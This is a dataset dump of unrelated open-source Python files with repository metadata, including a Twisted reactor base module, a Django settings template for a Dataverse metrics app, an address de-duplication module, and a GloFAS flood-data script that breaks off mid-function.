# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from generator import Generator
import random
class random_choice(Generator):
def __init__(self, choices, seed=None):
assert len(choices) > 0
self.__choices = choices
if seed is not None:
random.seed(seed)
def Generate(self):
"""Return one of the choices at random."""
while True:
yield random.choice(self.__choices)
if __name__ == "__main__":
from generator import PrintExamples
options = {'choices': ["James", "Ralph", "Rob", "Mike", "Harry"],
'seed': 2398639}
gen = random_choice(**options)
PrintExamples(gen)
|
bsd-3-clause
| -5,633,717,101,477,794,000
| 37.440678
| 80
| 0.713845
| false
| 4.395349
| false
| false
| false
|
openvenues/address_normalizer
|
address_normalizer/deduping/near_duplicates.py
|
1
|
6806
|
import geohash
import logging
import operator
from functools import partial
from itertools import chain, product, combinations, imap
from address_normalizer.deduping.duplicates import *
from address_normalizer.deduping.storage.base import *
from address_normalizer.text.gazetteers import *
from address_normalizer.text.normalize import *
from address_normalizer.models.address import *
from address_normalizer.models.venue import *
near_dupe_registry = {}
# Two lat/longs sharing a geohash prefix of 6 characters are within about 610 meters of each other
DEFAULT_GEOHASH_PRECISION = 6
logger = logging.getLogger('near_dupes')
class NearDupeMeta(type):
def __init__(cls, name, bases, dict_):
if 'abstract' not in dict_:
near_dupe_registry[cls.__entity_type__] = cls
super(NearDupeMeta, cls).__init__(name, bases, dict_)
dupe_cache = {}
class NearDupe(object):
abstract = True
__metaclass__ = NearDupeMeta
key_generators = ()
configured = False
storage = NopStorage()
@classmethod
def configure(cls, storage):
cls.storage = storage
@classmethod
def find_dupes(cls, ents):
if not ents:
return {}, {}, {}
entity_dict = {e.guid: e for e in ents}
clusters = defaultdict(set)
_ = [clusters[safe_encode(c)].add(ent.guid) for ent in ents for c in cls.gen_keys(ent)]
clusters = dict(clusters)
logger.info('{} clusters found'.format(len(clusters)))
logger.info('Checking for local dupes')
local_guid_pairs = set()
local_dupes = {}
for cluster_id, guids in clusters.iteritems():
if len(guids) < 2:
continue
local_guid_pairs.update(combinations(guids, 2))
for g1, g2 in local_guid_pairs:
ent1 = entity_dict[g1]
ent2 = entity_dict[g2]
if cls.exact_dupe.is_dupe(ent1, ent2):
cls.assign_local_dupe(local_dupes, ent1, ent2)
logger.info('Checking global dupes')
existing_clusters = defaultdict(list)
if clusters:
_ = [existing_clusters[c].append(guid) for c, guid in cls.storage.search(clusters.keys()).iteritems() if guid]
existing_guids = set()
existing_ents = {}
if existing_clusters:
existing_guids = set.union(*(set(v) for v in existing_clusters.itervalues()))
existing_ents = {guid: cls.model(json.loads(e)) for guid, e in cls.storage.multiget(list(existing_guids)).iteritems() if e}
global_dupes = {}
global_guid_pairs = set([(new_guid, existing_guid) for cluster_id, existing in existing_clusters.iteritems() for new_guid, existing_guid in product(clusters[cluster_id], existing)])
for new_guid, existing_guid in global_guid_pairs:
local_ent = entity_dict[new_guid]
existing_ent = existing_ents[existing_guid]
if cls.exact_dupe.is_dupe(existing_ent, local_ent):
cls.assign_global_dupe(global_dupes, existing_ent, local_ent)
logger.info('Done with global dupe checking')
return clusters, local_dupes, global_dupes
@classmethod
def check(cls, objects, add=True):
object_dict = {o.guid: o for o in objects}
clusters, local_dupes, global_dupes = cls.find_dupes(objects)
new_clusters = {}
new_objects = {}
dupes = local_dupes.copy()
dupes.update(global_dupes)
if add:
for k, guids in clusters.iteritems():
non_dupes = [g for g in guids if g not in dupes]
if non_dupes:
guid = non_dupes[0]
new_clusters[k] = guid
new_objects[guid] = object_dict[guid]
cls.add({guid: json.dumps(obj.to_primitive()) for guid, obj in new_objects.iteritems()})
cls.add_clusters(new_clusters)
return [(obj, (dupes.get(obj.guid, obj.guid), obj.guid in dupes)) for obj in objects]
@classmethod
def assign_local_dupe(cls, dupes, existing, new):
guid1 = existing.guid
guid2 = new.guid
guid1_existing = dupes.get(guid1)
guid2_existing = dupes.get(guid2)
if not guid1_existing and not guid2_existing:
dupes[guid1] = guid2
elif guid1_existing:
dupes[guid2] = guid1_existing
elif guid2_existing:
dupes[guid1] = guid2_existing
@classmethod
def assign_global_dupe(cls, dupes, existing, new):
dupes[new.guid] = existing.guid
@classmethod
def add(cls, kvs):
cls.storage.multiput(kvs)
@classmethod
def add_clusters(cls, kvs):
cls.storage.multiput(kvs)
class AddressNearDupe(NearDupe):
__entity_type__ = Address.entity_type
model = Address
exact_dupe = AddressDupe
geohash_precision = DEFAULT_GEOHASH_PRECISION
street_gazetteers = list(chain(*[gazette_field_registry[f] for f in (address_fields.NAME, address_fields.HOUSE_NUMBER, address_fields.STREET)]))
all_gazetteers = list(chain(*gazette_field_registry.values()))
@classmethod
def configure(cls, storage, bloom_filter=None, geohash_precision=DEFAULT_GEOHASH_PRECISION):
cls.storage = storage
if bloom_filter:
cls.bloom_filter = bloom_filter
cls.geohash_precision = geohash_precision
@classmethod
def expanded_street_address(cls, address):
street_address_components = []
house_number = (address.house_number or '').strip()
if house_number:
street_address_components.append(house_number)
street = (address.street or '').strip()
if street:
street_address_components.append(street)
surface_forms = set()
if street_address_components:
street_address = u' '.join(street_address_components)
# the return value from expand
return address_phrase_filter.expand_street_address(street_address)
@classmethod
def geohash(cls, address):
geo = geohash.encode(address.latitude, address.longitude, cls.geohash_precision)
neighbors = geohash.neighbors(geo)
all_geo = [geo] + neighbors
return all_geo
@classmethod
def gen_keys(cls, address):
street_surface_forms = cls.expanded_street_address(address)
if address.latitude and address.longitude:
all_geo = cls.geohash(address)
for geo, norm_address in product(all_geo, street_surface_forms):
key = '|'.join([geo, norm_address])
yield key
class VenueNearDupe(NearDupe):
__entity_type__ = Venue.entity_type
model = Venue
|
mit
| 7,338,996,294,223,279,000
| 31.108491
| 189
| 0.618425
| false
| 3.725233
| false
| false
| false
|
miyanishi2/caffe-rpc
|
caffe_extractor.py
|
1
|
1439
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'miyanishi'
import caffe
import numpy as np
class CaffeExtractor():
def __init__(self, caffe_root=None, feature_layers=["fc6"], gpu=True):
self.feature_layers = feature_layers
MODEL_FILE = caffe_root + 'examples/imagenet/imagenet_deploy.prototxt'
PRETRAINED = caffe_root + 'examples/imagenet/caffe_reference_imagenet_model'
MEAN_FILE = caffe_root + 'python/caffe/imagenet/ilsvrc_2012_mean.npy'
self.net = caffe.Classifier(MODEL_FILE, PRETRAINED, mean=np.load(MEAN_FILE),
channel_swap=(2,1,0),
raw_scale=255,
image_dims=(256, 256))
#self.net.set_phase_test()
if gpu:
self.net.set_mode_gpu()
else:
self.net.set_mode_cpu()
imagenet_labels_filename = caffe_root + 'data/ilsvrc12/synset_words.txt'
self.labels = np.loadtxt(imagenet_labels_filename, str, delimiter='\t')
def getImageFeatures(self, image):
score = self.net.predict([image])
feature_dic = {layer:np.copy(self.net.blobs[layer].data[4][:,0,0]) for layer in self.feature_layers}
return feature_dic
def getImageLabels(self):
top_k = self.net.blobs['prob'].data[4].flatten().argsort()[-1:-6:-1]
labels = self.labels[top_k].tolist()
return labels
|
bsd-2-clause
| -3,062,253,772,976,018,400
| 36.868421
| 108
| 0.587908
| false
| 3.323326
| false
| false
| false
|
Donkyhotay/MoonPy
|
twisted/internet/posixbase.py
|
1
|
14121
|
# -*- test-case-name: twisted.test.test_internet -*-
# Copyright (c) 2001-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Posix reactor base class
"""
import warnings
import socket
import errno
import os
from zope.interface import implements, classImplements
from twisted.python.compat import set
from twisted.internet.interfaces import IReactorUNIX, IReactorUNIXDatagram
from twisted.internet.interfaces import IReactorTCP, IReactorUDP, IReactorSSL, IReactorArbitrary
from twisted.internet.interfaces import IReactorProcess, IReactorMulticast
from twisted.internet.interfaces import IHalfCloseableDescriptor
from twisted.internet import error
from twisted.internet import tcp, udp
from twisted.python import log, failure, util
from twisted.persisted import styles
from twisted.python.runtime import platformType, platform
from twisted.internet.base import ReactorBase, _SignalReactorMixin
try:
from twisted.internet import ssl
sslEnabled = True
except ImportError:
sslEnabled = False
try:
from twisted.internet import unix
unixEnabled = True
except ImportError:
unixEnabled = False
processEnabled = False
if platformType == 'posix':
from twisted.internet import fdesc
import process
processEnabled = True
if platform.isWindows():
try:
import win32process
processEnabled = True
except ImportError:
win32process = None
class _Win32Waker(log.Logger, styles.Ephemeral):
"""I am a workaround for the lack of pipes on win32.
I am a pair of connected sockets which can wake up the main loop
from another thread.
"""
disconnected = 0
def __init__(self, reactor):
"""Initialize.
"""
self.reactor = reactor
# Following select_trigger (from asyncore)'s example;
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.setsockopt(socket.IPPROTO_TCP, 1, 1)
server.bind(('127.0.0.1', 0))
server.listen(1)
client.connect(server.getsockname())
reader, clientaddr = server.accept()
client.setblocking(0)
reader.setblocking(0)
self.r = reader
self.w = client
self.fileno = self.r.fileno
def wakeUp(self):
"""Send a byte to my connection.
"""
try:
util.untilConcludes(self.w.send, 'x')
except socket.error, (err, msg):
if err != errno.WSAEWOULDBLOCK:
raise
def doRead(self):
"""Read some data from my connection.
"""
try:
self.r.recv(8192)
except socket.error:
pass
def connectionLost(self, reason):
self.r.close()
self.w.close()
class _UnixWaker(log.Logger, styles.Ephemeral):
"""This class provides a simple interface to wake up the event loop.
This is used by threads or signals to wake up the event loop.
"""
disconnected = 0
i = None
o = None
def __init__(self, reactor):
"""Initialize.
"""
self.reactor = reactor
self.i, self.o = os.pipe()
fdesc.setNonBlocking(self.i)
fdesc._setCloseOnExec(self.i)
fdesc.setNonBlocking(self.o)
fdesc._setCloseOnExec(self.o)
self.fileno = lambda: self.i
def doRead(self):
"""Read some bytes from the pipe.
"""
fdesc.readFromFD(self.fileno(), lambda data: None)
def wakeUp(self):
"""Write one byte to the pipe, and flush it.
"""
# We don't use fdesc.writeToFD since we need to distinguish
# between EINTR (try again) and EAGAIN (do nothing).
if self.o is not None:
try:
util.untilConcludes(os.write, self.o, 'x')
except OSError, e:
if e.errno != errno.EAGAIN:
raise
def connectionLost(self, reason):
"""Close both ends of my pipe.
"""
if not hasattr(self, "o"):
return
for fd in self.i, self.o:
try:
os.close(fd)
except IOError:
pass
del self.i, self.o
if platformType == 'posix':
_Waker = _UnixWaker
elif platformType == 'win32':
_Waker = _Win32Waker
class PosixReactorBase(_SignalReactorMixin, ReactorBase):
"""
A basis for reactors that use file descriptors.
"""
implements(IReactorArbitrary, IReactorTCP, IReactorUDP, IReactorMulticast)
def __init__(self):
ReactorBase.__init__(self)
if self.usingThreads or platformType == "posix":
self.installWaker()
def _disconnectSelectable(self, selectable, why, isRead, faildict={
error.ConnectionDone: failure.Failure(error.ConnectionDone()),
error.ConnectionLost: failure.Failure(error.ConnectionLost())
}):
"""
Utility function for disconnecting a selectable.
Supports half-close notification, isRead should be boolean indicating
whether error resulted from doRead().
"""
self.removeReader(selectable)
f = faildict.get(why.__class__)
if f:
if (isRead and why.__class__ == error.ConnectionDone
and IHalfCloseableDescriptor.providedBy(selectable)):
selectable.readConnectionLost(f)
else:
self.removeWriter(selectable)
selectable.connectionLost(f)
else:
self.removeWriter(selectable)
selectable.connectionLost(failure.Failure(why))
def installWaker(self):
"""
Install a `waker' to allow threads and signals to wake up the IO thread.
We use the self-pipe trick (http://cr.yp.to/docs/selfpipe.html) to wake
the reactor. On Windows we use a pair of sockets.
"""
if not self.waker:
self.waker = _Waker(self)
self._internalReaders.add(self.waker)
self.addReader(self.waker)
# IReactorProcess
def spawnProcess(self, processProtocol, executable, args=(),
env={}, path=None,
uid=None, gid=None, usePTY=0, childFDs=None):
args, env = self._checkProcessArgs(args, env)
if platformType == 'posix':
if usePTY:
if childFDs is not None:
raise ValueError("Using childFDs is not supported with usePTY=True.")
return process.PTYProcess(self, executable, args, env, path,
processProtocol, uid, gid, usePTY)
else:
return process.Process(self, executable, args, env, path,
processProtocol, uid, gid, childFDs)
elif platformType == "win32":
if uid is not None or gid is not None:
raise ValueError("The uid and gid parameters are not supported on Windows.")
if usePTY:
raise ValueError("The usePTY parameter is not supported on Windows.")
if childFDs:
raise ValueError("Customizing childFDs is not supported on Windows.")
if win32process:
from twisted.internet._dumbwin32proc import Process
return Process(self, processProtocol, executable, args, env, path)
else:
raise NotImplementedError, "spawnProcess not available since pywin32 is not installed."
else:
raise NotImplementedError, "spawnProcess only available on Windows or POSIX."
# IReactorUDP
def listenUDP(self, port, protocol, interface='', maxPacketSize=8192):
"""Connects a given L{DatagramProtocol} to the given numeric UDP port.
@returns: object conforming to L{IListeningPort}.
"""
p = udp.Port(port, protocol, interface, maxPacketSize, self)
p.startListening()
return p
def connectUDP(self, remotehost, remoteport, protocol, localport=0,
interface='', maxPacketSize=8192):
"""DEPRECATED.
Connects a L{ConnectedDatagramProtocol} instance to a UDP port.
"""
warnings.warn("use listenUDP and then transport.connect().", DeprecationWarning, stacklevel=2)
p = udp.ConnectedPort((remotehost, remoteport), localport, protocol, interface, maxPacketSize, self)
p.startListening()
return p
# IReactorMulticast
def listenMulticast(self, port, protocol, interface='', maxPacketSize=8192, listenMultiple=False):
"""Connects a given DatagramProtocol to the given numeric UDP port.
EXPERIMENTAL.
@returns: object conforming to IListeningPort.
"""
p = udp.MulticastPort(port, protocol, interface, maxPacketSize, self, listenMultiple)
p.startListening()
return p
# IReactorUNIX
def connectUNIX(self, address, factory, timeout=30, checkPID=0):
"""@see: twisted.internet.interfaces.IReactorUNIX.connectUNIX
"""
assert unixEnabled, "UNIX support is not present"
c = unix.Connector(address, factory, timeout, self, checkPID)
c.connect()
return c
_unspecified = object()
def _checkMode(self, name, mode):
"""
Check C{mode} to see if a value was specified for it and emit a
deprecation warning if so. Return the default value if none was
specified, otherwise return C{mode}.
"""
if mode is not self._unspecified:
warnings.warn(
'The mode parameter of %(name)s will be removed. Do not pass '
'a value for it. Set permissions on the containing directory '
'before calling %(name)s, instead.' % dict(name=name),
category=DeprecationWarning,
stacklevel=3)
else:
mode = 0666
return mode
def listenUNIX(self, address, factory, backlog=50, mode=_unspecified,
wantPID=0):
"""
@see: twisted.internet.interfaces.IReactorUNIX.listenUNIX
"""
assert unixEnabled, "UNIX support is not present"
mode = self._checkMode('IReactorUNIX.listenUNIX', mode)
p = unix.Port(address, factory, backlog, mode, self, wantPID)
p.startListening()
return p
# IReactorUNIXDatagram
def listenUNIXDatagram(self, address, protocol, maxPacketSize=8192,
mode=_unspecified):
"""
Connects a given L{DatagramProtocol} to the given path.
EXPERIMENTAL.
@returns: object conforming to L{IListeningPort}.
"""
assert unixEnabled, "UNIX support is not present"
mode = self._checkMode('IReactorUNIXDatagram.listenUNIXDatagram', mode)
p = unix.DatagramPort(address, protocol, maxPacketSize, mode, self)
p.startListening()
return p
def connectUNIXDatagram(self, address, protocol, maxPacketSize=8192,
mode=_unspecified, bindAddress=None):
"""
Connects a L{ConnectedDatagramProtocol} instance to a path.
EXPERIMENTAL.
"""
assert unixEnabled, "UNIX support is not present"
mopde = self._checkMode('IReactorUNIXDatagram.connectUNIXDatagram', mode)
p = unix.ConnectedDatagramPort(address, protocol, maxPacketSize, mode, bindAddress, self)
p.startListening()
return p
# IReactorTCP
def listenTCP(self, port, factory, backlog=50, interface=''):
"""@see: twisted.internet.interfaces.IReactorTCP.listenTCP
"""
p = tcp.Port(port, factory, backlog, interface, self)
p.startListening()
return p
def connectTCP(self, host, port, factory, timeout=30, bindAddress=None):
"""@see: twisted.internet.interfaces.IReactorTCP.connectTCP
"""
c = tcp.Connector(host, port, factory, timeout, bindAddress, self)
c.connect()
return c
# IReactorSSL (sometimes, not implemented)
def connectSSL(self, host, port, factory, contextFactory, timeout=30, bindAddress=None):
"""@see: twisted.internet.interfaces.IReactorSSL.connectSSL
"""
assert sslEnabled, "SSL support is not present"
c = ssl.Connector(host, port, factory, contextFactory, timeout, bindAddress, self)
c.connect()
return c
def listenSSL(self, port, factory, contextFactory, backlog=50, interface=''):
"""@see: twisted.internet.interfaces.IReactorSSL.listenSSL
"""
assert sslEnabled, "SSL support is not present"
p = ssl.Port(port, factory, contextFactory, backlog, interface, self)
p.startListening()
return p
# IReactorArbitrary
def listenWith(self, portType, *args, **kw):
kw['reactor'] = self
p = portType(*args, **kw)
p.startListening()
return p
def connectWith(self, connectorType, *args, **kw):
kw['reactor'] = self
c = connectorType(*args, **kw)
c.connect()
return c
def _removeAll(self, readers, writers):
"""
Remove all readers and writers, and list of removed L{IReadDescriptor}s
and L{IWriteDescriptor}s.
Meant for calling from subclasses, to implement removeAll, like::
def removeAll(self):
return self._removeAll(self._reads, self._writes)
where C{self._reads} and C{self._writes} are iterables.
"""
removedReaders = set(readers) - self._internalReaders
for reader in removedReaders:
self.removeReader(reader)
removedWriters = set(writers)
for writer in removedWriters:
self.removeWriter(writer)
return list(removedReaders | removedWriters)
if sslEnabled:
classImplements(PosixReactorBase, IReactorSSL)
if unixEnabled:
classImplements(PosixReactorBase, IReactorUNIX, IReactorUNIXDatagram)
if processEnabled:
classImplements(PosixReactorBase, IReactorProcess)
__all__ = ["PosixReactorBase"]
|
gpl-3.0
| 8,697,282,309,824,158,000
| 32.147887
| 108
| 0.622477
| false
| 4.241814
| false
| false
| false
|
unfoldingWord-dev/uwadmin
|
uwadmin/migrations/0005_auto_20150524_1534.py
|
1
|
1202
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('uwadmin', '0004_auto_20150318_0034'),
]
operations = [
migrations.AddField(
model_name='publishrequest',
name='approved_at',
field=models.DateTimeField(default=None, null=True, db_index=True, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='publishrequest',
name='source_text',
field=models.ForeignKey(related_name='source_publish_requests', to='uwadmin.LangCode', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='publishrequest',
name='source_version',
field=models.CharField(max_length=10, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='publishrequest',
name='language',
field=models.ForeignKey(related_name='publish_requests', to='uwadmin.LangCode'),
preserve_default=True,
),
]
|
mit
| 8,915,345,621,021,246,000
| 30.631579
| 110
| 0.583195
| false
| 4.386861
| false
| false
| false
|
IQSS/miniverse
|
miniverse/settings/local_with_routing.py
|
1
|
6078
|
"""
Settings template for running two databases:
- Existing Dataverse databases (we only read it)
- Second database for Django core apps + Miniverse apps
Please read through and change the settings where noted
"""
from __future__ import absolute_import
import sys
from os import makedirs, environ
from os.path import join, isdir
from miniverse.testrunners.disable_migrations import DisableMigrations
from miniverse.settings.base import *
# -----------------------------------
# DEBUG
# - True: Dataverse Key required for API
# - Includes SQL for many of the API call results
# -----------------------------------
DEBUG = True #True False
# -----------------------------------
# TIME_ZONE
# -----------------------------------
TIME_ZONE = 'America/New_York'
# -----------------------------------
# Secret key
# -----------------------------------
SECRET_KEY = 'DEV-j94xnz*dj5f@_6-gt@ov)yjbcx0uagb7sv9a0j-(jo)j%m$el%'
# -----------------------------------
# Metrics cache settings
# -----------------------------------
METRICS_CACHE_VIEW = False
METRICS_CACHE_VIEW_TIME = 60 * 60 * 2 # Cache for visualizations
METRICS_CACHE_API_TIME = 60 * 15 # Cache for API endpoints
# -----------------------------------
# For local runs, this directory will include:
# - static files (after running 'collectstatic')
# - optional, sqlite db if that's used for the Django apps db
# -----------------------------------
LOCAL_SETUP_DIR = join(PROJECT_ROOT, 'test_setup')
if not isdir(LOCAL_SETUP_DIR):
makedirs(LOCAL_SETUP_DIR)
# -----------------------------------
# Database routing.
# e.g. between the Dataverse db and Django db
# -----------------------------------
DATABASE_ROUTERS = ['miniverse.db_routers.db_dataverse_router.DataverseRouter',]
# -----------------------------------
# URL of the Dataverse db being read
# -----------------------------------
#DATAVERSE_INSTALLATION_URL = 'https://demo.dataverse.org'
#DATAVERSE_INSTALLATION_URL = 'https://dataverse.harvard.edu'
DATAVERSE_INSTALLATION_URL = 'http://localhost:8080'
# -----------------------------------
# Database Setup
# - default -> Create a new db for the django/miniverse specific apps
# - May be any relational db type: postgres, sqlite, etc
# - dataverse -> Read-only users for the Dataverse Posgres db
# -----------------------------------
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': join(LOCAL_SETUP_DIR, 'miniverse_default.db3'),
},
'dataverse': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'dvndb', # dvndb_demo, dvn_thedata, dvndb
'USER': 'postgres', # Set to a read-only user
'PASSWORD': '123',
'HOST': 'localhost',
'TEST': {
'MIRROR': 'default', # For running tests, only create 1 db
},
}
}
# -----------------------------------
# Need when running DEBUG = False
# -----------------------------------
ALLOWED_HOSTS = ('127.0.0.1', 'dd7be506.ngrok.io')
# -----------------------------------
# Need to set when RestrictAdminMiddleware is active
# -----------------------------------
INTERNAL_IPS = ('127.0.0.1',)
# -----------------------------------
# Slackbot
# -----------------------------------
SLACK_USERNAME = 'dvbot'
SLACK_BOT_TOKEN = environ.get('SLACK_BOT_TOKEN')
BOT_ID = environ.get('BOT_ID')
SLACK_WEBHOOK_SECRET = environ.get('SLACK_WEBHOOK_SECRET')
# -----------------------------------
# Optional MIDDLEWARE_CLASSES
# -----------------------------------
MIDDLEWARE_CLASSES += [
# Restrict by IP address
#'dv_apps.admin_restrict.middleware.RestrictAdminMiddleware',
# Email about broken 404s
#'django.middleware.common.BrokenLinkEmailsMiddleware',
]
# -----------------------------------
# cookie name
# -----------------------------------
SESSION_COOKIE_NAME = 'dv_metrics'
# -----------------------------------
# Where static files are collected
# -----------------------------------
STATIC_ROOT = join(LOCAL_SETUP_DIR, 'staticfiles')
if not isdir(STATIC_ROOT):
makedirs(STATIC_ROOT)
# -----------------------------------
# Django Debug TOOLBAR CONFIGURATION
# -----------------------------------
# See: http://django-debug-toolbar.readthedocs.org/en/latest/installation.html#explicit-setup
# -----------------------------------
INSTALLED_APPS += (
'debug_toolbar',
'django.contrib.admindocs',
)
MIDDLEWARE_CLASSES += [
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
DEBUG_TOOLBAR_PATCH_SETTINGS = False
# http://django-debug-toolbar.readthedocs.org/en/latest/installation.html
# -----------------------------------
# For running tests:
# - Only create 1 test database it has to be a Postgres db
# - Remove the Database routing
# - Disable migrations. e.g., We don't want to run them
# - Set a new TEST_RUNNER:
# - We want to *create* unmanaged tables in the test db
# - Disable timezone awareness for fixture loading
# -----------------------------------
if 'test' in sys.argv or 'test_coverage' in sys.argv: # Covers regular testing and django-coverage
DATABASES['default']['ENGINE'] = 'django.db.backends.postgresql_psycopg2'
DATABASES['default']['HOST'] = 'localhost'
DATABASES['default']['USER'] = 'postgres'
DATABASES['default']['PASSWORD'] = '123'
# The custom routers we're using to route certain ORM queries
# to the remote host conflict with our overridden db settings.
# Set DATABASE_ROUTERS to an empty list to return to the defaults
# during the test run.
DATABASE_ROUTERS = []
MIGRATION_MODULES = DisableMigrations()
# Set Django's test runner a custom class that will create
# 'unmanaged' tables
TEST_RUNNER = 'miniverse.testrunners.managed_model_test_runner.ManagedModelTestRunner'
# Disable timezone awareness to False to avoid warnings when loading fixtures
# e.g. to avoid: RuntimeWarning: (some object)received a naive datetime (2016-08-16
# 09:25:41.349000) while time zone support is active.
USE_TZ = False
|
mit
| 906,195,234,186,292,000
| 33.534091
| 99
| 0.557585
| false
| 3.980354
| true
| false
| false
|
sanluca/py-acqua
|
setup.py
|
1
|
1902
|
# -*- coding: iso-8859-15 -*-
#Copyright (C) 2005, 2008 Py-Acqua
#http://www.pyacqua.net
#email: info@pyacqua.net
#
#
#Py-Acqua is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
#Py-Acqua is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Py-Acqua; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import sys
import glob
from distutils.core import setup
###
def moon_walk (root_dir, repl):
packages, data_files = [], []
for dirpath, dirnames, filenames in os.walk (root_dir):
for i, dirname in enumerate (dirnames):
if dirname.startswith('.'): del dirnames[i]
data_files.append(("share/pyacqua/" + repl + dirpath[len(root_dir):], [os.path.join(dirpath, f) for f in filenames]))
return data_files
if __name__ != "__main__":
print moon_walk (sys.argv[1])
else:
setup (
name="py-acqua",
version="1.0",
description="PyAcqua program",
author="Francesco Piccinno",
author_email="stack.box@gmail.com",
url="http://pyacqua.altervista.org",
scripts=["src/acqua.py"],
package_dir={'pyacqua': 'src'},
packages=['pyacqua'],
data_files=moon_walk ("skins", "skins") + moon_walk ("locale", "locale") + [
#("src", glob.glob ("src/*")),
("share/pyacqua/plugins", glob.glob ("plugins/*.py")),
("share/pyacqua/pixmaps", glob.glob ("pixmaps/*")),
("share/pyacqua/tips", ["src/tip_of_the_day_en.txt", "src/tip_of_the_day.txt"])
]
)
|
gpl-2.0
| 8,070,389,984,959,156,000
| 32.368421
| 120
| 0.679811
| false
| 3.05297
| false
| false
| false
|
bhermansyah/DRR-datacenter
|
scripts/misc-boedy1996/glofas_refactor.py
|
1
|
6276
|
import os, sys
os.environ.setdefault("DJANGO_SETTINGS_MODULE","geonode.settings")
import csv
from django.db import connection, connections
from django.conf import settings
from geodb.models import Glofasintegrated, AfgBasinLvl4GlofasPoint
from netCDF4 import Dataset, num2date
import numpy as np
from django.contrib.gis.geos import Point
def getRefactorData():
# f_IN = open("/Users/budi/Documents/iMMAP/DRR-datacenter/scripts/misc-boedy1996/Glofas_Baseline_Output_Adjustment_factor.csv", 'rU')
f_IN = open("/home/ubuntu/Glofas_Baseline_Output_Adjustment_factor.csv", 'rU')
reader = csv.reader(f_IN)
first = True
data = {}
for row in reader:
if first:
first = False
else:
lon = row[2]
lat = row[1]
# data[lat][lon]['rl2_factor']=row[8]
data[lat]={lon:{'rl2_factor':row[8],'rl5_factor':row[9],'rl20_factor':row[10]}}
f_IN.close()
# print data['67.75']['31.85']
return data
def calculate_glofas_params(date):
date_arr = date.split('-')
filename = getattr(settings, 'GLOFAS_NC_FILES')+date_arr[0]+date_arr[1]+date_arr[2]+"00.nc"
# print Glofasintegrated.objects.latest('datadate').date
nc = Dataset(filename, 'r', Format='NETCDF4')
# get coordinates variables
lats = nc.variables['lat'][:]
lons = nc.variables['lon'][:]
rl2s= nc.variables['rl2'][:]
rl5s= nc.variables['rl5'][:]
rl20s= nc.variables['rl20'][:]
times = nc.variables['time'][:]
essemble = nc.variables['ensemble'][:]
# convert date, how to store date only strip away time?
# print "Converting Dates"
units = nc.variables['time'].units
dates = num2date (times[:], units=units, calendar='365_day')
d = np.array(nc.variables['dis'])
# header = ['Latitude', 'Longitude', 'rl2', 'rl5', 'rl20', 'rl2_dis_percent', 'rl2_avg_dis_percent', 'rl5_dis_percent', 'rl5_avg_dis_percent', 'rl20_dis_percent', 'rl20_avg_dis_percent']
times_index=[]
for i,j in enumerate(times):
times_index.append(i)
coord_index = 0
refactor = getRefactorData()
for lat, lon, rl2, rl5, rl20 in zip(lats, lons, rl2s, rl5s, rl20s):
# print str(lat), str(lon)
try:
# print refactor[str(lat)][str(lon)]
rl2_temp = rl2*float(refactor[str(lat)][str(lon)]['rl2_factor'])
rl5_temp = rl5*float(refactor[str(lat)][str(lon)]['rl5_factor'])
rl20_temp = rl20*float(refactor[str(lat)][str(lon)]['rl20_factor'])
except:
rl2_temp = rl2
rl5_temp = rl5
rl20_temp = rl20
rl2 = rl2_temp
rl5 = rl5_temp
rl20 = rl20_temp
# print rl2,rl5,rl20, refactor[str(lat)][str(lon)]['rl2_factor']
data_in = []
data_in.append(lat)
data_in.append(lon)
data_in.append(rl2)
data_in.append(rl5)
data_in.append(rl20)
rl2_dis_percent = []
rl5_dis_percent = []
rl20_dis_percent = []
rl2_avg_dis = []
rl5_avg_dis = []
rl20_avg_dis = []
for i in times_index:
data = d[i,:,coord_index]
dis_data = []
for l in data:
dis_data.append(l)
dis_avg = np.median(dis_data)
count = sum(1 for x in data if x>rl2)
percent_rl2 = round(float(count)/float(51)*100)
rl2_avg_dis.append(round(float(dis_avg)/float(rl2)*100))
rl2_dis_percent.append(percent_rl2)
count = sum(1 for x in data if x>rl5)
percent_rl5 = round(float(count)/float(51)*100)
rl5_avg_dis.append(round(float(dis_avg)/float(rl5)*100))
rl5_dis_percent.append(percent_rl5)
count = sum(1 for x in data if x>rl20)
percent_rl20 = round(float(count)/float(51)*100)
rl20_avg_dis.append(round(float(dis_avg)/float(rl20)*100))
rl20_dis_percent.append(percent_rl20)
if i>=19:
break
# print rl2_avg_dis
data_in.append(max(rl2_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl2_dis_percent):
if item == max(rl2_dis_percent):
# print index, item
temp_avg_dis.append(rl2_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl2_avg_dis_percent = max(temp_avg_dis)
data_in.append(max(rl5_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl5_dis_percent):
if item == max(rl5_dis_percent):
# print index, item
temp_avg_dis.append(rl5_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl5_avg_dis_percent = max(temp_avg_dis)
data_in.append(max(rl20_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl20_dis_percent):
if item == max(rl20_dis_percent):
# print index, item
temp_avg_dis.append(rl20_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl20_avg_dis_percent = max(temp_avg_dis)
if coord_index>2035 and max(rl2_dis_percent)>=25:
